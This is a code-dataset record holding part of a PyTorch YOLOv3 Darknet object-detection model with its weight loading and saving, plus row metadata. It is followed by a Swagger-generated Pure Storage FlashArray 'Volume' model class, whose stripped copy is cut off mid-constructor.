modules.add_module(f"leaky_{module_i}", nn.LeakyReLU(0.1))
elif module_def["type"] == "maxpool":
kernel_size = int(module_def["size"])
stride = int(module_def["stride"])
if kernel_size == 2 and stride == 1:
modules.add_module(
f"_debug_padding_{module_i}", nn.ZeroPad2d((0, 1, 0, 1)))
maxpool = nn.MaxPool2d(
kernel_size=kernel_size,
stride=stride,
padding=int(
(kernel_size - 1) // 2))
modules.add_module(f"maxpool_{module_i}", maxpool)
elif module_def["type"] == "upsample":
upsample = Upsample(scale_factor=int(
module_def["stride"]), mode="nearest")
modules.add_module(f"upsample_{module_i}", upsample)
elif module_def["type"] == "route":
layers = [int(x) for x in module_def["layers"].split(",")]
filters = sum([output_filters[1:][i] for i in layers])
modules.add_module(f"route_{module_i}", EmptyLayer())
elif module_def["type"] == "shortcut":
filters = output_filters[1:][int(module_def["from"])]
modules.add_module(f"shortcut_{module_i}", EmptyLayer())
elif module_def["type"] == "yolo":
anchor_idxs = [int(x) for x in module_def["mask"].split(",")]
# Extract anchors
anchors = [int(x) for x in module_def["anchors"].split(",")]
anchors = [(anchors[i], anchors[i + 1])
for i in range(0, len(anchors), 2)]
anchors = [anchors[i] for i in anchor_idxs]
num_classes = int(module_def["classes"])
img_size = int(hyperparams["height"])
# Define detection layer
yolo_layer = YOLOLayer(anchors, num_classes, ignore_width, img_size)
modules.add_module(f"yolo_{module_i}", yolo_layer)
# Register module list and number of output filters
module_list.append(modules)
output_filters.append(filters)
return hyperparams, module_list
class Upsample(nn.Module):
""" nn.Upsample is deprecated """
def __init__(self, scale_factor, mode="nearest"):
super(Upsample, self).__init__()
self.scale_factor = scale_factor
self.mode = mode
def forward(self, x):
x = F.interpolate(x, scale_factor=self.scale_factor, mode=self.mode)
return x
class EmptyLayer(nn.Module):
"""Placeholder for 'route' and 'shortcut' layers"""
def __init__(self):
super(EmptyLayer, self).__init__()
class YOLOLayer(nn.Module):
"""Detection layer"""
def __init__(self, anchors, num_classes, ignore_width=32, img_dim=416):
super(YOLOLayer, self).__init__()
self.anchors = anchors
self.num_anchors = len(anchors)
self.num_classes = num_classes
self.ignore_width = ignore_width
self.ignore_thres = 0.5
self.mse_loss = nn.MSELoss()
self.bce_loss = nn.BCELoss()
self.obj_scale = 1
self.noobj_scale = 100
self.metrics = {}
self.img_dim = img_dim
self.grid_size = 0 # grid size
def compute_grid_offsets(self, grid_size, cuda=True):
self.grid_size = grid_size
g = self.grid_size
FloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
self.stride = self.img_dim / self.grid_size
# Calculate offsets for each grid
self.grid_x = torch.arange(g).repeat(
g, 1).view([1, 1, g, g]).type(FloatTensor)
self.grid_y = torch.arange(g).repeat(
g, 1).t().view([1, 1, g, g]).type(FloatTensor)
self.scaled_anchors = FloatTensor(
[(a_w / self.stride, a_h / self.stride) for a_w, a_h in self.anchors])
self.anchor_w = self.scaled_anchors[:, 0:1].view(
(1, self.num_anchors, 1, 1))
self.anchor_h = self.scaled_anchors[:, 1:2].view(
(1, self.num_anchors, 1, 1))
def forward(self, x, targets=None, image_size=416, return_metrics=False):
# Tensors for cuda support
FloatTensor = torch.cuda.FloatTensor if x.is_cuda else torch.FloatTensor
self.img_dim = image_size
num_samples = x.size(0)
grid_size = x.size(2)
prediction = (
x.view(num_samples, self.num_anchors,
self.num_classes + 5, grid_size, grid_size)
.permute(0, 1, 3, 4, 2)
.contiguous()
)
# Get outputs
x = torch.sigmoid(prediction[..., 0]) # Center x
y = torch.sigmoid(prediction[..., 1]) # Center y
w = prediction[..., 2] # Width
h = prediction[..., 3] # Height
pred_conf = torch.sigmoid(prediction[..., 4]) # Conf
pred_cls = torch.sigmoid(prediction[..., 5:]) # Cls pred.
if grid_size != self.grid_size:
self.compute_grid_offsets(grid_size, cuda=x.is_cuda)
# Add offset and scale with anchors
pred_boxes = FloatTensor(prediction[..., :4].shape)
pred_boxes[..., 0] = x.data + self.grid_x
pred_boxes[..., 1] = y.data + self.grid_y
pred_boxes[..., 2] = torch.exp(w.data) * self.anchor_w
pred_boxes[..., 3] = torch.exp(h.data) * self.anchor_h
# Only keep predictions inside the boundary
# Note: Due to FPN, predictions across different scales are combined
# Need to adjust slice boundary accordingly
assert (grid_size * self.ignore_width) % C.SIZE == 0
boundary = grid_size * self.ignore_width // C.SIZE
output = torch.cat(
(slice_boundary(
pred_boxes, boundary).view(
num_samples, -1, 4) * self.stride, slice_boundary(
pred_conf, boundary).view(
num_samples, -1, 1), pred_cls.view(
num_samples, -1, self.num_classes), ), -1, )
if targets is None:
return output, 0
iou_scores, obj_mask, noobj_mask, tx, ty, tw, th, tconf =\
build_targets(
pred_boxes=pred_boxes,
target=targets,
anchors=self.scaled_anchors,
ignore_thres=self.ignore_thres,
)
# Remove the boundary from predictions, ground truth, and masks
# when computing the loss.
tensors = [pred_boxes, pred_conf, tconf, x, tx, y, ty,
w, tw, h, th, iou_scores, obj_mask, noobj_mask]
(pred_boxes, pred_conf, tconf, x, tx, y, ty,
w, tw, h, th, iou_scores, obj_mask, noobj_mask) = [
slice_boundary(tensor, boundary)
for tensor in tensors
]
# Loss : Mask outputs to ignore non-existing objects (except with conf.
# loss)
loss_x = self.mse_loss(x[obj_mask.bool()], tx[obj_mask.bool()])
loss_y = self.mse_loss(y[obj_mask.bool()], ty[obj_mask.bool()])
loss_w = self.mse_loss(w[obj_mask.bool()], tw[obj_mask.bool()])
loss_h = self.mse_loss(h[obj_mask.bool()], th[obj_mask.bool()])
loss_conf_obj = self.bce_loss(
pred_conf[obj_mask.bool()], tconf[obj_mask.bool()])
loss_conf_noobj = self.bce_loss(
pred_conf[noobj_mask.bool()], tconf[noobj_mask.bool()])
loss_conf = self.obj_scale * loss_conf_obj + self.noobj_scale * loss_conf_noobj
if obj_mask.bool().sum().item() == 0:
total_loss = self.noobj_scale * loss_conf_noobj
else:
# Ignore useless classification loss
total_loss = loss_x + loss_y + loss_w + loss_h + loss_conf
if torch.isnan(total_loss).item():
import pdb
pdb.set_trace()
if not return_metrics:
return output, total_loss
else:
# Metrics
conf_obj = pred_conf[obj_mask.bool()].mean()
conf_noobj = pred_conf[noobj_mask.bool()].mean()
conf50 = (pred_conf > 0.5).float()
iou50 = (iou_scores > 0.5).float()
iou75 = (iou_scores > 0.75).float()
detected_mask = conf50 * tconf
precision = torch.sum(iou50 * detected_mask) / \
(conf50.sum() + 1e-16)
recall50 = torch.sum(iou50 * detected_mask) / \
(obj_mask.sum() + 1e-16)
recall75 = torch.sum(iou75 * detected_mask) / \
(obj_mask.sum() + 1e-16)
self.metrics = {
"loss": to_cpu(total_loss).item(),
"x": to_cpu(loss_x).item(),
"y": to_cpu(loss_y).item(),
"w": to_cpu(loss_w).item(),
"h": to_cpu(loss_h).item(),
"conf": to_cpu(loss_conf).item(),
"recall50": to_cpu(recall50).item(),
"recall75": to_cpu(recall75).item(),
"precision": to_cpu(precision).item(),
"conf_obj": to_cpu(conf_obj).item(),
"conf_noobj": to_cpu(conf_noobj).item(),
"grid_size": grid_size,
}
return output, total_loss, self.metrics
class Darknet(nn.Module):
"""YOLOv3 object detection model"""
def __init__(self, config_path, ignore_width, num_classes=80, img_size=416):
super(Darknet, self).__init__()
self.module_defs = parse_model_config(config_path, num_classes)
self.hyperparams, self.module_list = create_modules(
self.module_defs, ignore_width)
self.yolo_layers = [
layer[0] for layer in self.module_list if hasattr(
layer[0], "metrics")]
self.img_size = img_size
self.seen = 0
self.header_info = np.array([0, 0, 0, self.seen, 0], dtype=np.int32)
def forward(self, x, targets):
img_dim = x.shape[2]
loss = 0
layer_outputs, yolo_outputs = [], []
for i, (module_def, module) in enumerate(
zip(self.module_defs, self.module_list)):
if module_def["type"] in ["convolutional", "upsample", "maxpool"]:
x = module(x)
elif module_def["type"] == "route":
x = torch.cat([layer_outputs[int(layer_i)]
for layer_i in module_def["layers"].split(",")], 1)
elif module_def["type"] == "shortcut":
layer_i = int(module_def["from"])
x = layer_outputs[-1] + layer_outputs[layer_i]
elif module_def["type"] == "yolo":
outputs = module[0](x, targets, img_dim)
x, layer_loss = module[0](x, targets, img_dim)
loss += layer_loss
yolo_outputs.append(x)
layer_outputs.append(x)
yolo_outputs = to_cpu(torch.cat(yolo_outputs, 1))
return loss, yolo_outputs
def infer(self, x):
loss, yolo_outputs = self.forward(x, None)
return yolo_outputs
def load_darknet_weights(self, weights_path):
"""Parses and loads the weights stored in 'weights_path'"""
# Open the weights file
with open(weights_path, "rb") as f:
# First five are header values
header = np.fromfile(f, dtype=np.int32, count=5)
self.header_info = header # Needed to write header when saving weights
self.seen = header[3] # number of images seen during training
weights = np.fromfile(f, dtype=np.float32) # The rest are weights
# Establish cutoff for loading backbone weights
cutoff = None
if "darknet53.conv.74" in weights_path:
cutoff = 75
ptr = 0
for i, (module_def, module) in enumerate(
zip(self.module_defs, self.module_list)):
if i == cutoff:
break
if module_def["type"] == "convolutional":
conv_layer = module[0]
if module_def["batch_normalize"]:
# Load BN bias, weights, running mean and running variance
bn_layer = module[1]
num_b = bn_layer.bias.numel() # Number of biases
# Bias
bn_b = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.bias)
bn_layer.bias.data.copy_(bn_b)
ptr += num_b
# Weight
bn_w = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.weight)
bn_layer.weight.data.copy_(bn_w)
ptr += num_b
# Running Mean
bn_rm = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.running_mean)
bn_layer.running_mean.data.copy_(bn_rm)
ptr += num_b
# Running Var
bn_rv = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.running_var)
bn_layer.running_var.data.copy_(bn_rv)
ptr += num_b
else:
# Load conv. bias
num_b = conv_layer.bias.numel()
conv_b = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(conv_layer.bias)
conv_layer.bias.data.copy_(conv_b)
ptr += num_b
# Load conv. weights
num_w = conv_layer.weight.numel()
conv_w = torch.from_numpy(
weights[ptr: ptr + num_w]).view_as(conv_layer.weight)
conv_layer.weight.data.copy_(conv_w)
ptr += num_w
def save_darknet_weights(self, path, cutoff=-1):
"""
@:param path - path of the new weights file
@:param cutoff - save layers between 0 and cutoff (cutoff = -1 -> all are saved)
"""
fp = open(path, "wb")
self.header_info[3] = self.seen
self.header_info.tofile(fp)
# Iterate through layers
for i, (module_def, module) in enumerate(
zip(self.module_defs[:cutoff], self.module_list[:cutoff])):
if module_def["type"] == "convolutional":
conv_layer = module[0]
# If batch norm, load bn first
if module_def["batch_normalize"]:
bn_layer = module[1]
bn_layer.bias.data.cpu().numpy().tofile(fp)
bn_layer.weight.data.cpu().numpy().tofile(fp)
bn_layer.running_mean.data.cpu().numpy().tofile(fp)
bn_layer.running_var.data.cpu().numpy().tofile(fp)
# Load conv bias
else:
conv_layer.bias.data.cpu().numpy().tofile(fp)
# Load conv weights
conv_layer.weight.data.cpu().numpy().tofile(fp)
fp.close()
| 40.914425
| 93
| 0.553783
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from .utils import (slice_boundary,
parse_model_config,
to_cpu,
build_targets)
from . import constants as C
def create_modules(module_defs, ignore_width):
hyperparams = module_defs.pop(0)
output_filters = [int(hyperparams["channels"])]
module_list = nn.ModuleList()
for module_i, module_def in enumerate(module_defs):
modules = nn.Sequential()
if module_def["type"] == "convolutional":
bn = int(module_def["batch_normalize"])
filters = int(module_def["filters"])
kernel_size = int(module_def["size"])
pad = (kernel_size - 1) // 2
modules.add_module(
f"conv_{module_i}",
nn.Conv2d(
in_channels=output_filters[-1],
out_channels=filters,
kernel_size=kernel_size,
stride=int(module_def["stride"]),
padding=pad,
bias=not bn,
),
)
if bn:
modules.add_module(f"batch_norm_{module_i}", nn.BatchNorm2d(
filters, momentum=0.9, eps=1e-5))
if module_def["activation"] == "leaky":
modules.add_module(f"leaky_{module_i}", nn.LeakyReLU(0.1))
elif module_def["type"] == "maxpool":
kernel_size = int(module_def["size"])
stride = int(module_def["stride"])
if kernel_size == 2 and stride == 1:
modules.add_module(
f"_debug_padding_{module_i}", nn.ZeroPad2d((0, 1, 0, 1)))
maxpool = nn.MaxPool2d(
kernel_size=kernel_size,
stride=stride,
padding=int(
(kernel_size - 1) // 2))
modules.add_module(f"maxpool_{module_i}", maxpool)
elif module_def["type"] == "upsample":
upsample = Upsample(scale_factor=int(
module_def["stride"]), mode="nearest")
modules.add_module(f"upsample_{module_i}", upsample)
elif module_def["type"] == "route":
layers = [int(x) for x in module_def["layers"].split(",")]
filters = sum([output_filters[1:][i] for i in layers])
modules.add_module(f"route_{module_i}", EmptyLayer())
elif module_def["type"] == "shortcut":
filters = output_filters[1:][int(module_def["from"])]
modules.add_module(f"shortcut_{module_i}", EmptyLayer())
elif module_def["type"] == "yolo":
anchor_idxs = [int(x) for x in module_def["mask"].split(",")]
anchors = [int(x) for x in module_def["anchors"].split(",")]
anchors = [(anchors[i], anchors[i + 1])
for i in range(0, len(anchors), 2)]
anchors = [anchors[i] for i in anchor_idxs]
num_classes = int(module_def["classes"])
img_size = int(hyperparams["height"])
yolo_layer = YOLOLayer(anchors, num_classes, ignore_width, img_size)
modules.add_module(f"yolo_{module_i}", yolo_layer)
module_list.append(modules)
output_filters.append(filters)
return hyperparams, module_list
class Upsample(nn.Module):
def __init__(self, scale_factor, mode="nearest"):
super(Upsample, self).__init__()
self.scale_factor = scale_factor
self.mode = mode
def forward(self, x):
x = F.interpolate(x, scale_factor=self.scale_factor, mode=self.mode)
return x
class EmptyLayer(nn.Module):
def __init__(self):
super(EmptyLayer, self).__init__()
class YOLOLayer(nn.Module):
def __init__(self, anchors, num_classes, ignore_width=32, img_dim=416):
super(YOLOLayer, self).__init__()
self.anchors = anchors
self.num_anchors = len(anchors)
self.num_classes = num_classes
self.ignore_width = ignore_width
self.ignore_thres = 0.5
self.mse_loss = nn.MSELoss()
self.bce_loss = nn.BCELoss()
self.obj_scale = 1
self.noobj_scale = 100
self.metrics = {}
self.img_dim = img_dim
self.grid_size = 0
def compute_grid_offsets(self, grid_size, cuda=True):
self.grid_size = grid_size
g = self.grid_size
FloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
self.stride = self.img_dim / self.grid_size
self.grid_x = torch.arange(g).repeat(
g, 1).view([1, 1, g, g]).type(FloatTensor)
self.grid_y = torch.arange(g).repeat(
g, 1).t().view([1, 1, g, g]).type(FloatTensor)
self.scaled_anchors = FloatTensor(
[(a_w / self.stride, a_h / self.stride) for a_w, a_h in self.anchors])
self.anchor_w = self.scaled_anchors[:, 0:1].view(
(1, self.num_anchors, 1, 1))
self.anchor_h = self.scaled_anchors[:, 1:2].view(
(1, self.num_anchors, 1, 1))
def forward(self, x, targets=None, image_size=416, return_metrics=False):
FloatTensor = torch.cuda.FloatTensor if x.is_cuda else torch.FloatTensor
self.img_dim = image_size
num_samples = x.size(0)
grid_size = x.size(2)
prediction = (
x.view(num_samples, self.num_anchors,
self.num_classes + 5, grid_size, grid_size)
.permute(0, 1, 3, 4, 2)
.contiguous()
)
x = torch.sigmoid(prediction[..., 0])
y = torch.sigmoid(prediction[..., 1])
w = prediction[..., 2]
h = prediction[..., 3]
pred_conf = torch.sigmoid(prediction[..., 4])
pred_cls = torch.sigmoid(prediction[..., 5:])
if grid_size != self.grid_size:
self.compute_grid_offsets(grid_size, cuda=x.is_cuda)
pred_boxes = FloatTensor(prediction[..., :4].shape)
pred_boxes[..., 0] = x.data + self.grid_x
pred_boxes[..., 1] = y.data + self.grid_y
pred_boxes[..., 2] = torch.exp(w.data) * self.anchor_w
pred_boxes[..., 3] = torch.exp(h.data) * self.anchor_h
assert (grid_size * self.ignore_width) % C.SIZE == 0
boundary = grid_size * self.ignore_width // C.SIZE
output = torch.cat(
(slice_boundary(
pred_boxes, boundary).view(
num_samples, -1, 4) * self.stride, slice_boundary(
pred_conf, boundary).view(
num_samples, -1, 1), pred_cls.view(
num_samples, -1, self.num_classes), ), -1, )
if targets is None:
return output, 0
iou_scores, obj_mask, noobj_mask, tx, ty, tw, th, tconf =\
build_targets(
pred_boxes=pred_boxes,
target=targets,
anchors=self.scaled_anchors,
ignore_thres=self.ignore_thres,
)
tensors = [pred_boxes, pred_conf, tconf, x, tx, y, ty,
w, tw, h, th, iou_scores, obj_mask, noobj_mask]
(pred_boxes, pred_conf, tconf, x, tx, y, ty,
w, tw, h, th, iou_scores, obj_mask, noobj_mask) = [
slice_boundary(tensor, boundary)
for tensor in tensors
]
loss_x = self.mse_loss(x[obj_mask.bool()], tx[obj_mask.bool()])
loss_y = self.mse_loss(y[obj_mask.bool()], ty[obj_mask.bool()])
loss_w = self.mse_loss(w[obj_mask.bool()], tw[obj_mask.bool()])
loss_h = self.mse_loss(h[obj_mask.bool()], th[obj_mask.bool()])
loss_conf_obj = self.bce_loss(
pred_conf[obj_mask.bool()], tconf[obj_mask.bool()])
loss_conf_noobj = self.bce_loss(
pred_conf[noobj_mask.bool()], tconf[noobj_mask.bool()])
loss_conf = self.obj_scale * loss_conf_obj + self.noobj_scale * loss_conf_noobj
if obj_mask.bool().sum().item() == 0:
total_loss = self.noobj_scale * loss_conf_noobj
else:
total_loss = loss_x + loss_y + loss_w + loss_h + loss_conf
if torch.isnan(total_loss).item():
import pdb
pdb.set_trace()
if not return_metrics:
return output, total_loss
else:
conf_obj = pred_conf[obj_mask.bool()].mean()
conf_noobj = pred_conf[noobj_mask.bool()].mean()
conf50 = (pred_conf > 0.5).float()
iou50 = (iou_scores > 0.5).float()
iou75 = (iou_scores > 0.75).float()
detected_mask = conf50 * tconf
precision = torch.sum(iou50 * detected_mask) / \
(conf50.sum() + 1e-16)
recall50 = torch.sum(iou50 * detected_mask) / \
(obj_mask.sum() + 1e-16)
recall75 = torch.sum(iou75 * detected_mask) / \
(obj_mask.sum() + 1e-16)
self.metrics = {
"loss": to_cpu(total_loss).item(),
"x": to_cpu(loss_x).item(),
"y": to_cpu(loss_y).item(),
"w": to_cpu(loss_w).item(),
"h": to_cpu(loss_h).item(),
"conf": to_cpu(loss_conf).item(),
"recall50": to_cpu(recall50).item(),
"recall75": to_cpu(recall75).item(),
"precision": to_cpu(precision).item(),
"conf_obj": to_cpu(conf_obj).item(),
"conf_noobj": to_cpu(conf_noobj).item(),
"grid_size": grid_size,
}
return output, total_loss, self.metrics
class Darknet(nn.Module):
def __init__(self, config_path, ignore_width, num_classes=80, img_size=416):
super(Darknet, self).__init__()
self.module_defs = parse_model_config(config_path, num_classes)
self.hyperparams, self.module_list = create_modules(
self.module_defs, ignore_width)
self.yolo_layers = [
layer[0] for layer in self.module_list if hasattr(
layer[0], "metrics")]
self.img_size = img_size
self.seen = 0
self.header_info = np.array([0, 0, 0, self.seen, 0], dtype=np.int32)
def forward(self, x, targets):
img_dim = x.shape[2]
loss = 0
layer_outputs, yolo_outputs = [], []
for i, (module_def, module) in enumerate(
zip(self.module_defs, self.module_list)):
if module_def["type"] in ["convolutional", "upsample", "maxpool"]:
x = module(x)
elif module_def["type"] == "route":
x = torch.cat([layer_outputs[int(layer_i)]
for layer_i in module_def["layers"].split(",")], 1)
elif module_def["type"] == "shortcut":
layer_i = int(module_def["from"])
x = layer_outputs[-1] + layer_outputs[layer_i]
elif module_def["type"] == "yolo":
outputs = module[0](x, targets, img_dim)
x, layer_loss = module[0](x, targets, img_dim)
loss += layer_loss
yolo_outputs.append(x)
layer_outputs.append(x)
yolo_outputs = to_cpu(torch.cat(yolo_outputs, 1))
return loss, yolo_outputs
def infer(self, x):
loss, yolo_outputs = self.forward(x, None)
return yolo_outputs
def load_darknet_weights(self, weights_path):
with open(weights_path, "rb") as f:
header = np.fromfile(f, dtype=np.int32, count=5)
self.header_info = header
self.seen = header[3]
weights = np.fromfile(f, dtype=np.float32)
cutoff = None
if "darknet53.conv.74" in weights_path:
cutoff = 75
ptr = 0
for i, (module_def, module) in enumerate(
zip(self.module_defs, self.module_list)):
if i == cutoff:
break
if module_def["type"] == "convolutional":
conv_layer = module[0]
if module_def["batch_normalize"]:
bn_layer = module[1]
num_b = bn_layer.bias.numel()
bn_b = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.bias)
bn_layer.bias.data.copy_(bn_b)
ptr += num_b
bn_w = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.weight)
bn_layer.weight.data.copy_(bn_w)
ptr += num_b
bn_rm = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.running_mean)
bn_layer.running_mean.data.copy_(bn_rm)
ptr += num_b
bn_rv = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(bn_layer.running_var)
bn_layer.running_var.data.copy_(bn_rv)
ptr += num_b
else:
num_b = conv_layer.bias.numel()
conv_b = torch.from_numpy(
weights[ptr: ptr + num_b]).view_as(conv_layer.bias)
conv_layer.bias.data.copy_(conv_b)
ptr += num_b
num_w = conv_layer.weight.numel()
conv_w = torch.from_numpy(
weights[ptr: ptr + num_w]).view_as(conv_layer.weight)
conv_layer.weight.data.copy_(conv_w)
ptr += num_w
def save_darknet_weights(self, path, cutoff=-1):
fp = open(path, "wb")
self.header_info[3] = self.seen
self.header_info.tofile(fp)
for i, (module_def, module) in enumerate(
zip(self.module_defs[:cutoff], self.module_list[:cutoff])):
if module_def["type"] == "convolutional":
conv_layer = module[0]
if module_def["batch_normalize"]:
bn_layer = module[1]
bn_layer.bias.data.cpu().numpy().tofile(fp)
bn_layer.weight.data.cpu().numpy().tofile(fp)
bn_layer.running_mean.data.cpu().numpy().tofile(fp)
bn_layer.running_var.data.cpu().numpy().tofile(fp)
else:
conv_layer.bias.data.cpu().numpy().tofile(fp)
conv_layer.weight.data.cpu().numpy().tofile(fp)
fp.close()
| true
| true
|
1c40cef8afd98421821fb3f4e64ddeed3a028230
| 8,928
|
py
|
Python
|
pypureclient/flasharray/FA_2_2/models/volume.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 14
|
2018-12-07T18:30:27.000Z
|
2022-02-22T09:12:33.000Z
|
pypureclient/flasharray/FA_2_2/models/volume.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 28
|
2019-09-17T21:03:52.000Z
|
2022-03-29T22:07:35.000Z
|
pypureclient/flasharray/FA_2_2/models/volume.py
|
Flav-STOR-WL/py-pure-client
|
03b889c997d90380ac5d6380ca5d5432792d3e89
|
[
"BSD-2-Clause"
] | 15
|
2020-06-11T15:50:08.000Z
|
2022-03-21T09:27:25.000Z
|
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_2 import models
class Volume(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'connection_count': 'int',
'created': 'int',
'destroyed': 'bool',
'host_encryption_key_status': 'str',
'provisioned': 'int',
'qos': 'Qos',
'serial': 'str',
'space': 'Space',
'time_remaining': 'int',
'pod': 'Reference',
'source': 'FixedReference',
'subtype': 'str',
'volume_group': 'Reference',
'requested_promotion_state': 'str',
'promotion_status': 'str'
}
attribute_map = {
'id': 'id',
'name': 'name',
'connection_count': 'connection_count',
'created': 'created',
'destroyed': 'destroyed',
'host_encryption_key_status': 'host_encryption_key_status',
'provisioned': 'provisioned',
'qos': 'qos',
'serial': 'serial',
'space': 'space',
'time_remaining': 'time_remaining',
'pod': 'pod',
'source': 'source',
'subtype': 'subtype',
'volume_group': 'volume_group',
'requested_promotion_state': 'requested_promotion_state',
'promotion_status': 'promotion_status'
}
required_args = {
}
def __init__(
self,
id=None, # type: str
name=None, # type: str
connection_count=None, # type: int
created=None, # type: int
destroyed=None, # type: bool
host_encryption_key_status=None, # type: str
provisioned=None, # type: int
qos=None, # type: models.Qos
serial=None, # type: str
space=None, # type: models.Space
time_remaining=None, # type: int
pod=None, # type: models.Reference
source=None, # type: models.FixedReference
subtype=None, # type: str
volume_group=None, # type: models.Reference
requested_promotion_state=None, # type: str
promotion_status=None, # type: str
):
"""
Keyword args:
id (str): A globally unique, system-generated ID. The ID cannot be modified and cannot refer to another resource.
name (str): A user-specified name. The name must be locally unique and can be changed.
connection_count (int): The total number of hosts and host groups connected to the volume.
created (int): The volume creation time. Measured in milliseconds since the UNIX epoch.
destroyed (bool): Returns a value of `true` if the volume has been destroyed and is pending eradication. The `time_remaining` value displays the amount of time left until the destroyed volume is permanently eradicated. Before the `time_remaining` period has elapsed, the destroyed volume can be recovered by setting `destroyed=false`. Once the `time_remaining` period has elapsed, the volume is permanently eradicated and can no longer be recovered.
host_encryption_key_status (str): The host encryption key status for this volume. Possible values include `none`, `detected`, and `fetched`.
provisioned (int): The virtual size of the volume. Measured in bytes and must be a multiple of 512.
qos (Qos): Displays QoS limit information.
serial (str): A globally unique serial number generated by the system when the volume is created.
space (Space): Displays size and space consumption information.
time_remaining (int): The amount of time left until the destroyed volume is permanently eradicated. Measured in milliseconds. Before the `time_remaining` period has elapsed, the destroyed volume can be recovered by setting `destroyed=false`.
pod (Reference): A reference to the pod.
source (FixedReference): A reference to the originating volume as a result of a volume copy.
subtype (str): The type of volume. Valid values are `protocol_endpoint` and `regular`.
volume_group (Reference): A reference to the volume group.
requested_promotion_state (str): Valid values are `promoted` and `demoted`. Patch `requested_promotion_state` to `demoted` to demote the volume so that the volume stops accepting write requests. Patch `requested_promotion_state` to `promoted` to promote the volume so that the volume starts accepting write requests.
promotion_status (str): Current promotion status of a volume. Valid values are `promoted` and `demoted`. A status of `promoted` indicates that the volume has been promoted and can accept write requests from hosts. This is the default status for a volume when it is created. A status of `demoted` indicates that the volume has been demoted and no longer accepts write requests.
"""
if id is not None:
self.id = id
if name is not None:
self.name = name
if connection_count is not None:
self.connection_count = connection_count
if created is not None:
self.created = created
if destroyed is not None:
self.destroyed = destroyed
if host_encryption_key_status is not None:
self.host_encryption_key_status = host_encryption_key_status
if provisioned is not None:
self.provisioned = provisioned
if qos is not None:
self.qos = qos
if serial is not None:
self.serial = serial
if space is not None:
self.space = space
if time_remaining is not None:
self.time_remaining = time_remaining
if pod is not None:
self.pod = pod
if source is not None:
self.source = source
if subtype is not None:
self.subtype = subtype
if volume_group is not None:
self.volume_group = volume_group
if requested_promotion_state is not None:
self.requested_promotion_state = requested_promotion_state
if promotion_status is not None:
self.promotion_status = promotion_status
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `Volume`".format(key))
if key == "provisioned" and value is not None:
if value > 4503599627370496:
raise ValueError("Invalid value for `provisioned`, value must be less than or equal to `4503599627370496`")
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Volume, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Volume):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 42.312796
| 461
| 0.610887
|
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_2 import models
class Volume(object):
swagger_types = {
'id': 'str',
'name': 'str',
'connection_count': 'int',
'created': 'int',
'destroyed': 'bool',
'host_encryption_key_status': 'str',
'provisioned': 'int',
'qos': 'Qos',
'serial': 'str',
'space': 'Space',
'time_remaining': 'int',
'pod': 'Reference',
'source': 'FixedReference',
'subtype': 'str',
'volume_group': 'Reference',
'requested_promotion_state': 'str',
'promotion_status': 'str'
}
attribute_map = {
'id': 'id',
'name': 'name',
'connection_count': 'connection_count',
'created': 'created',
'destroyed': 'destroyed',
'host_encryption_key_status': 'host_encryption_key_status',
'provisioned': 'provisioned',
'qos': 'qos',
'serial': 'serial',
'space': 'space',
'time_remaining': 'time_remaining',
'pod': 'pod',
'source': 'source',
'subtype': 'subtype',
'volume_group': 'volume_group',
'requested_promotion_state': 'requested_promotion_state',
'promotion_status': 'promotion_status'
}
required_args = {
}
def __init__(
self,
id=None,
name=None,
connection_count=None,
created=None,
destroyed=None,
host_encryption_key_status=None,
provisioned=None,
qos=None,
serial=None,
space=None,
time_remaining=None,
pod=None,
source=None,
subtype=None,
volume_group=None,
requested_promotion_state=None,
promotion_status=None,
):
if id is not None:
self.id = id
if name is not None:
self.name = name
if connection_count is not None:
self.connection_count = connection_count
if created is not None:
self.created = created
if destroyed is not None:
self.destroyed = destroyed
if host_encryption_key_status is not None:
self.host_encryption_key_status = host_encryption_key_status
if provisioned is not None:
self.provisioned = provisioned
if qos is not None:
self.qos = qos
if serial is not None:
self.serial = serial
if space is not None:
self.space = space
